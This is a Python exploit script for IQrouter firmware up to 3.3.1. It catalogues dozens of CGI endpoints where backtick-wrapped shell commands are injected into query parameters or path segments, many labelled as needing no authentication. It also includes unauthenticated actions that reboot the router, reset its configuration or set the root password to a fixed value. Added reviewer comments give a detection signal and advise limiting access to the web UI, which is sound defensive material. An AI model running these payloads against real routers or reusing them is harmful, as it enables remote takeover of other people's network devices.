iqrouter 3.3.1 firmware remote code execution

# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A
# NOTE(review): the header says "N/A", but the banner printed below lists five
# CVE identifiers; the banner is the more specific of the two.

#!/usr/bin/env python3

# Reviewer notes for defenders:
# - Every entry in rce_setup and rce_any wraps the caller-supplied string in
#   shell backticks inside a query parameter or path segment under
#   /cgi-bin/luci/er/. A backtick (or ${IFS} / a tab standing in for a space)
#   in a request to that prefix is therefore a usable detection signal in web
#   or proxy logs.
# - The script sends no credentials or session cookie with any request.
# - advanced_payloads are state-changing actions (reboot, config reset,
#   password change) reached with a plain GET.
# - Per the header, firmware up to 3.3.1 is affected; the fixed release is not
#   stated here, so confirm it with the vendor. Until updated, keep the web UI
#   reachable only from trusted management hosts.

import argparse
from sys import argv, exit

# A missing dependency is only reported here; execution continues.
try:
    import requests
except ImportError:
    print("Install requests lib! pip3 install requests")

# Banner. Interior padding was lost when the page was extracted; line breaks
# are restored at the obvious boundaries.
print("""
#######################################################################
# IQrouter multiple RCE and other vulnerabilities #
# by drakylar (Shaposhnikov Ilya) #
# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #
# CVE-2020-11967 CVE-2020-11968 #
#######################################################################
""")

# Each catalogue entry is [url_template, description]; "{}" in the template is
# where the -c/--cmd value is substituted.

# Endpoints the author labels as needing the router to be in setup mode.
rce_setup = [
    ["/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
     "RCE /vlanTag (vlan_tag param)"],
    ["/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
     "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
     "RCE /screen9 (s2 param)"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
     "RCE /screen9 (s1 param)"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
     "RCE /screen9 (p2 param)"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
     "RCE /screen9 (p1 param)"],
    ["/cgi-bin/luci/er/screen4?save_isp='`{}`",
     "RCE /screen4 (save_isp param)"],
    ["/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
     "RCE /screen2 set_wan_modem_interfaces param)"],
    ["/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
     "RCE /screen2 find_ip_address_conflict param)"],
    ["/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
     "RCE /screen10 (set_security_question param)"],
    ["/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
     "RCE /screen10 (set_security_answer param)"],
    ["/cgi-bin/luci/er/screen1?zonename='`{}`'",
     "RCE /screen1 (zonename param)"],
    ["/cgi-bin/luci/er/register?email=`{}`",
     "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"],
]

# Endpoints the author labels as reachable without authentication.
rce_any = [
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
     "RCE /wifi (s2 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
     "RCE /wifi (s1 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
     "RCE /wifi (p2 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
     "RCE /wifi (p1 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
     "RCE /wifi (guestwifi_5g_ssid param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
     "RCE /wifi (guestwifi_2g_ssid param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
     "RCE /wifi (guest_key param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
     "RCE /wifi (enable_guestwifi param)"],
    ["/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123",
     "RCE /screen11.1 (email param)"],
    ["/cgi-bin/luci/er/reboot_link?link='`{}`'",
     "RCE /reboot_link (link param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
     "RCE /diag_wifi (htm5ghz param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
     "RCE /diag_wifi (htm2ghz param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
     "RCE /diag_wifi (c5ghz param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
     "RCE /diag_wifi (c2ghz param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
     "RCE /diag_set_static_wan (static_ip param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
     "RCE /diag_set_static_wan (net_mask param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
     "RCE /diag_set_static_wan (gateway param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
     "RCE /diag_set_static_wan (dns param)"],
    ["/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
     "RCE /diag_set_static_modem (static_ip param)"],
    ["/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
     "RCE /diag_set_static_modem (net_mask param)"],
    ["/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
     "RCE /diag_set_static_modem (gateway param)"],
    ["/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
     "RCE /diag_set_device_name_and_sync (device_name param)"],
    ["/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
     "RCE /diag_set_device_name (device_name param)"],
    ["/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
     "RCE /diag_pppoe_update (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
     "RCE /diag_pppoe_update (wan_password param)"],
    ["/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
     "RCE /diag_pppoe (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
     "RCE /diag_pppoe (wan_password param)"],
    ["/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
     "RCE /diag_pppoa_update (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
     "RCE /diag_pppoa_update (wan_password param)"],
    ["/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
     "RCE /diag_pppoa (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
     "RCE /diag_pppoa (wan_password param)"],
    ["/cgi-bin/luci/er/advanced_link?link='`{}`'",
     "RCE /advanced_link (link param)"],
]

# Fixed-URL actions; these templates contain no "{}" placeholder, so the
# -c/--cmd value has no effect on them.
advanced_payloads = [
    ["/cgi-bin/luci/er/reboot_link?reboot=1",
     "Reboot IQrouter (/reboot_link reboot param))"],
    ["/cgi-bin/luci/er/screen2?reboot=1",
     "Reboot IQrouter (/screen2 reboot param))"],
    ["/cgi-bin/luci/er/index?reset_config=1",
     "Reset IQrouter (/index reset_config param)"],
    ["/cgi-bin/luci/er/screen7?upgrade=1",
     "Upgrade IQrouter (/screen7 upgrade param)"],
    ["/cgi-bin/luci/er/vlanTag?restart_network=1",
     "Restart network (/vlanTag restart_network param)"],
    ["/cgi-bin/luci/er/diag_iperf_cmd/start",
     "Start iperf script (/diag_iperf_cmd/start)"],
    ["/cgi-bin/luci/er/diag_iperf_cmd/stop",
     "Stop iperf script (/diag_iperf_cmd/stop)"],
    ["/cgi-bin/luci/er/get_syslog",
     "Router setup info log (/get_syslog)"],
    ["/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
     "Change root password to c00lpasswd (can change in code)"],
    ["/cgi-bin/luci/er/reset_password/",
     "Change root password to 'changeme' (static)"],
]


def print_payloads():
    """Print the numbered catalogue under three section banners.

    Sections are printed in the order rce_any, rce_setup, advanced_payloads,
    with one running counter across all three.
    """
    print('#' * 30)
    print("Payloads list")
    sections = (
        ('######################### RCE without auth ########################',
         rce_any),
        ('############### RCE (router need to be in setup mode) ###############',
         rce_setup),
        ('######################### Advanced payloads #########################',
         advanced_payloads),
    )
    counter = 0
    for banner, entries in sections:
        print(banner)
        for _template, label in entries:
            counter += 1
            print("{} - {}".format(counter, label))


# Command-line interface. Arguments are parsed at import time, not in main().
parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)',
                    default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
                    default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
                    default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
                    default="http", type=str)
args = parser.parse_args()


def main():
    """Validate the parsed arguments, build one URL and issue a single GET.

    The entry is chosen by 1-based index into
    rce_setup + rce_any + advanced_payloads. Any validation failure prints a
    message, then the argparse help and the catalogue, and exits with status 1.
    Only the HTTP status code of the response is reported.
    """
    print("")
    catalogue = rce_setup + rce_any + advanced_payloads
    total = len(catalogue)
    try:
        target_host = args.host
        target_port = args.port
        choice = int(args.num)
        command = args.cmd
        scheme = args.protocol

        # Each failed check reports itself, then falls through to the shared
        # help/exit path via IndexError.
        if not 1 <= choice <= total:
            print("Error with payload number!")
            raise IndexError
        if not 0 <= target_port <= 65535:
            print("Error with port number")
            raise IndexError
        if scheme not in ('http', 'https'):
            print("Error with protocol name")
            raise IndexError

        selected = catalogue[choice - 1]
        print("Payload: {}".format(selected[1]))
        print("Host: {}".format(target_host))
        print("Port: {}".format(target_port))
        print("Protocol: {}".format(scheme))
        print("Command: {}".format(command))

        request_path = selected[0].format(command)
        full_url = "{}://{}:{}{}".format(scheme, target_host, target_port,
                                         request_path)
        print("Built URL: {}".format(full_url))

        response = requests.get(full_url)
        print("Status code: {}".format(response.status_code))
        return
    except IndexError:
        parser.print_help()
        print_payloads()
        exit(1)


if __name__ == '__main__':
    print(
        "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
    exit(main())
